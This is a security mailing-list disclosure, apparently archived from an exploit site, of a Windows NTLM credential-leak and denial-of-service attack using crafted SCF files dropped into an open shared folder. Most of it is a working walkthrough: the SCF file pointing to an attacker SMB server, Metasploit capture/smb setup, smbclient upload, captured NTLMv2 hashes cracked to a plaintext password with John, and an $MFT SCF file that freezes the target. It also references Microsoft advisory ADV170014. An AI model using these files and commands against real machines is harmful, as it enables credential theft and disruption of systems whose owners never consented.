Windows NTLM Auth Hash Disclosure / Denial Of Service

`Hello,  
  
I want to share some information with the people on the list.  
On May 24, I found a problem with NTLM auth on Windows.  
  
Under certain circumstances a shared folder on Windows can be abused  
remotely to obtain the user credentials and to freeze the machine.  
  
This was already reported to MSRC on May 24, and was closed on October 18.  
  
This attack makes use of SCF files, and a shared folder with certain  
configuration.  
  
-Create a folder anywhere on the system, example on the Desktop  
-Right click - Properties  
-Sharing tab  
-Network and Sharing center  
-Enable 'Turn off password protected sharing'  
  
Now, you need a crafted SCF file to abuse this, the file looks like this  
  
root@sysadminjd:~# cat test.scf  
[Shell]  
Command=2  
IconFile=\\192.168.1.111\share\test.ico  
[Taskbar]  
Command=ToggleDesktop  
  
root@sysadminjd:~#  
  
We are going to upload this file to the newly shared folder, we'll use  
smbclient, but first we need a metasploit console running capture/smb  
auxiliary module.  
  
root@sysadminjd:~# msfconsole -q  
  
msf > use auxiliary/server/capture/smb  
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt  
JOHNPWFILE = /tmp/smbhash.txt  
msf auxiliary(smb) > exploit -j  
[*] Auxiliary module running as background job  
  
[*] Server started.  
msf auxiliary(smb)  
  
  
Now we can upload the file  
  
root@sysadminjd:~# smbclient //192.168.1.67/Users  
WARNING: The "syslog" option is deprecated  
Enter root's password:  
OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]  
smb: \> cd juan  
smb: \juan\> cd Desktop\  
smb: \juan\Desktop\> cd prueba2\  
smb: \juan\Desktop\prueba2\> put test.scf  
putting file test.scf as \juan\Desktop\prueba2\test.scf (88.9 kb/s)  
(average 88.9 kb/s)  
smb: \juan\Desktop\prueba2\> ls  
. D 0 Mon Oct 23 12:27:15 2017  
.. D 0 Mon Oct 23 12:27:15 2017  
.DS_Store AH 6148 Tue May 23 17:29:03 2017  
test.scf A 91 Mon Oct 23 12:27:15 2017  
  
6527487 blocks of size 4096. 4043523 blocks available  
smb: \juan\Desktop\prueba2\>  
root@sysadminjd:~#  
  
Our metasploit console should look like this  
  
msf auxiliary(smb) >  
[*] SMB Captured - 2017-10-23 12:27:15 -0400  
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67  
USER:juan DOMAIN:juan-PC OS: LM:  
LMHASH:Disabled  
LM_CLIENT_CHALLENGE:Disabled  
NTHASH:47894338d99abe2f08e2c693618c7323  
NT_CLIENT_CHALLENGE:0101000000000000d0046aca1b4cd301d755c3756d5639d800000000020000000000000000000000  
[*] SMB Captured - 2017-10-23 12:27:15 -0400  
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67  
USER:juan DOMAIN:juan-PC OS: LM:  
LMHASH:Disabled  
LM_CLIENT_CHALLENGE:Disabled  
NTHASH:e97b70559f29462e2ca221d31113b9ca  
NT_CLIENT_CHALLENGE:0101000000000000a0177dca1b4cd301f59d5c5d52708e3b00000000020000000000000000000000  
[*] SMB Captured - 2017-10-23 12:27:15 -0400  
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67  
USER:juan DOMAIN:juan-PC OS: LM:  
LMHASH:Disabled  
LM_CLIENT_CHALLENGE:Disabled  
NTHASH:eb8b228b739cc95a12d7e0d89d89e002  
NT_CLIENT_CHALLENGE:0101000000000000620389ca1b4cd3017283fc96884767b700000000020000000000000000000000  
[*] SMB Captured - 2017-10-23 12:37:09 -0400  
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67  
USER:juan DOMAIN:juan-PC OS: LM:  
LMHASH:Disabled  
LM_CLIENT_CHALLENGE:Disabled  
NTHASH:4abb0803c4afd1509bfca3bbc566ad70  
NT_CLIENT_CHALLENGE:010100000000000076d7742c1d4cd30161b2c77a54bd58fe00000000020000000000000000000000  
[*] SMB Captured - 2017-10-23 12:37:09 -0400  
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67  
USER:juan DOMAIN:juan-PC OS: LM:  
LMHASH:Disabled  
LM_CLIENT_CHALLENGE:Disabled  
NTHASH:5eeb82aab85e9663624aaf6500e4d8f8  
NT_CLIENT_CHALLENGE:010100000000000046ea872c1d4cd301c7a724adf323918c00000000020000000000000000000000  
  
I chopped this one to avoid sending too much to the list.  
  
When we started the smb capture module, we passed the option  
  
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt  
  
So our hashes are on /tmp/smbhash.txt  
  
Let's try with John  
  
root@sysadminjd:~# cd /tmp/  
root@sysadminjd:/tmp# john smbhash.txt_netntlmv2  
Using default input encoding: UTF-8  
Rules/masks using ISO-8859-1  
Loaded 6 password hashes with 6 different salts (netntlmv2, NTLMv2 C/R [MD4  
HMAC-MD5 32/64])  
Press 'q' or Ctrl-C to abort, almost any other key for status  
abc (juan)  
abc (juan)  
abc (juan)  
abc (juan)  
abc (juan)  
abc (juan)  
6g 0:00:00:00 DONE 2/3 (2017-10-23 12:27) 75.86g/s 404596p/s 585124c/s  
585124C/s abc  
Use the "--show" option to display all of the cracked passwords reliably  
Session completed  
root@sysadminjd:/tmp#  
  
That's it, now we have the plain text password for the machine.  
  
If we want to freeze the machine, we can attack via $MFT with a SCF file  
like this  
  
root@sysadminjd:~# cat mft.scf  
[Shell]  
Command=2  
IconFile= c:\$MFT\123  
[Taskbar]  
Command=ToggleDesktop  
root@sysadminjd:~#  
  
Just upload it to the vulnerable folder, and the machine will freeze in a  
few minutes due to $MFT NTFS issue.  
  
Accordingly to MS, all Windows versions are affected, they released an  
advisory for this:  
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV170014#ID0EGB  
  
It's a partial patch, there are no real fix for this, and the regcode  
change proposed by MS is only for Windows 10 and Server 2016.  
  
I have a better-explained post about this on my blog  
  
English: http://www.sysadminjd.com/adv170014-ntlm-sso-exploitation-guide/  
Spanish: https://www.sysadminjd.com/adv170014-ntlm-sso-guia-de-explotacion/  
  
thanks for your time :)  
  
Best Regards  
  
  
Juan Diego  
--------  
aSS  
  
  
`